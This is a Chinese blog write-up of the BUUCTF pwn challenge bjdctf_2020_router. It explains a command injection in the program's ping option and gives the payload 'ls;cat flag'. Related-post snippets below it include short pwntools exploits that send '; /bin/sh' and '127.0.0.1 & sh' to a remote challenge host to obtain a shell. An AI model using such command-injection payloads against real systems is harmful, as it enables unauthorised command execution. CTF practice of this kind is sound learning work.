BUUCTF-bjdctf_2020_router-WP

最新推荐文章于 2025-04-21 11:47:14 发布
最新推荐文章于 2025-04-21 11:47:14 发布
阅读量489 收藏
点赞数
分类专栏: BUUCTF 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/arraylocalhost/article/details/128981622
版权
文章介绍了如何使用checksec工具检查64位程序的安全性,接着通过IDA调试器定位到main()函数,发现了一个功能,该功能允许用户通过ping命令控制buf并拼接到dest后执行。利用这一漏洞,通过nc连接远程服务器并执行ls;catflag命令,成功获取了flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.checksec

64位 

2.IDA

 有一个菜单选择

main()函数

功能1是一个ping命令

buf可控,拼接在dest后,Linux里用;(分号)连接两个命令,同时执行 

nc连接上远程,选择功能1,同时执行命令  ls;cat flag

3.EXP

得到flag 

openwrt-ramips-mt7621-xiaomi_redmi-router-ac2100-initramfs-kernel.bin
07-31
小米/红米AC2100
PHP - Net_RouterOS:MikroTik RouterOS API协议的客户端,用PHP编写。-开源
04-16
MikroTik RouterOS API协议的客户端,用PHP编写。 简单,经过测试和记录。 欢迎所有反馈。
BUUCTFbjdctf_2020_router
m0_51251108的博客
12-31 377
BUUCTFbjdctf_2020_router linux里面命令可以用;或&分隔,接下来就可以输我们要的命令了
[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 409
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
BUUCTF bjdctf_2020_router
最新发布
2401_88087539的博客
04-21 128
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 1112
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 344
BUUCTF 做题练习
bjdctf_2020_router
、moddemod
07-06 488
exp from pwn import * p = remote('node3.buuoj.cn', 28110) p.sendlineafter('choose:', b'1') p.sendlineafter('address', b'127.0.0.1 & sh') p.interactive()
MikroTik-RouterOS-X86_64-DISK2G-L5-V7.ova
06-10
MikroTik-RouterOS-X86_64-DISK2G-L5-V7
MySQL Router 8.0.27(mysql-router-8.0.27-macos11-x86_64.tar.gz)
11-18
MySQL Router 8.0.27(mysql-router-8.0.27-macos11-x86_64.tar.gz),适用于macOS 11 (x86, 64-bit), Compressed TAR Archive
ErickKS_vite-react-router_1744170364.zip
04-09
ErickKS_vite-react-router_1744170364
bjdctf_2020_router 1
weixin_74861133的博客
03-10 450
逻辑很简单,一直打印菜单,但仔细看来只有1有用,别的都是迷惑的,1中的功能先是读入一个0x10大小的字符串buf,然后使用strcat函数将buf拼接在dest后面,那这个dest是什么呢,我们先随便输入一个字符串跟据后面的提示想到dest应该是ping,因为ping命令后面什么也不跟会报错。还有一种方法就是上面已经有了dest的值了。
bjdctf-2020-router
m0_73743784的博客
09-01 305
其实知道 Linux 中的命令执行可以用;分隔就会非常简单。
BJDCTF2020 router
qq_39980610的博客
08-23 337
BJDCTF2020 router
BJDCTF-2020-WRITEUP---TiKi小组
pone2233的博客
03-23 2540
title: BJDCTF 2020 刷题记录 categories: CTF tags: BJDCTF CTF2020 BJDCTF Web duangShell 根据提示,输入.index.php.swp下载到源码。 之后在linux内输入vim -r index.php.swp即可看到源码 <!DOCTYPE html> <html lang="en"> &...
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 381
BUUCTF 做题练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值